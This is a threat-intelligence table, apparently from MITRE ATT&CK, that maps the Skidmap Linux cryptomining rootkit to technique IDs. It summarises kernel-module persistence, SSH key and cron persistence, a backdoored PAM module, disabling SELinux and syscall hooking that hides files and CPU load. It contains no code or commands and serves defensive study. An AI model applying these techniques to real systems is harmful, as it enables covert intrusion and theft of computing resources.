| enterprise |
T1098 |
Account Manipulation |
- |
| enterprise |
T1098.004 |
SSH Authorized Keys |
Skidmap has the ability to add the public key of its handlers to the authorized_keys file to maintain persistence on an infected host. |
| enterprise |
T1547 |
Boot or Logon Autostart Execution |
- |
| enterprise |
T1547.006 |
Kernel Modules and Extensions |
Skidmap has the ability to install several loadable kernel modules (LKMs) on infected machines. |
| enterprise |
T1059 |
Command and Scripting Interpreter |
- |
| enterprise |
T1059.004 |
Unix Shell |
Skidmap has used pm.sh to download and install its main payload. |
| enterprise |
T1140 |
Deobfuscate/Decode Files or Information |
Skidmap has the ability to download, unpack, and decrypt tar.gz files . |
| enterprise |
T1083 |
File and Directory Discovery |
Skidmap has checked for the existence of specific files including /usr/sbin/setenforce and /etc/selinux/config. It also has the ability to monitor the cryptocurrency miner file and process. |
| enterprise |
T1562 |
Impair Defenses |
- |
| enterprise |
T1562.001 |
Disable or Modify Tools |
Skidmap has the ability to set SELinux to permissive mode. |
| enterprise |
T1105 |
Ingress Tool Transfer |
Skidmap has the ability to download files on an infected host. |
| enterprise |
T1036 |
Masquerading |
- |
| enterprise |
T1036.005 |
Match Legitimate Name or Location |
Skidmap has created a fake rm binary to replace the legitimate Linux binary. |
| enterprise |
T1556 |
Modify Authentication Process |
- |
| enterprise |
T1556.003 |
Pluggable Authentication Modules |
Skidmap has the ability to replace the pam_unix.so file on an infected machine with its own malicious version that accepts a specific backdoor password for all users. |
| enterprise |
T1027 |
Obfuscated Files or Information |
Skidmap has encrypted it’s main payload using 3DES. |
| enterprise |
T1057 |
Process Discovery |
Skidmap has monitored critical processes to ensure resiliency. |
| enterprise |
T1496 |
Resource Hijacking |
Skidmap is a kernel-mode rootkit used for cryptocurrency mining. |
| enterprise |
T1014 |
Rootkit |
Skidmap is a kernel-mode rootkit that has the ability to hook system calls to hide specific files and fake network and CPU-related statistics to make the CPU load of the infected machine always appear low. |
| enterprise |
T1053 |
Scheduled Task/Job |
- |
| enterprise |
T1053.003 |
Cron |
Skidmap has installed itself via crontab. |
| enterprise |
T1518 |
Software Discovery |
- |
| enterprise |
T1518.001 |
Security Software Discovery |
Skidmap has the ability to check if /usr/sbin/setenforce exists. This file controls what mode SELinux is in. |
| enterprise |
T1082 |
System Information Discovery |
Skidmap has the ability to check whether the infected system’s OS is Debian or RHEL/CentOS to determine which cryptocurrency miner it should use. |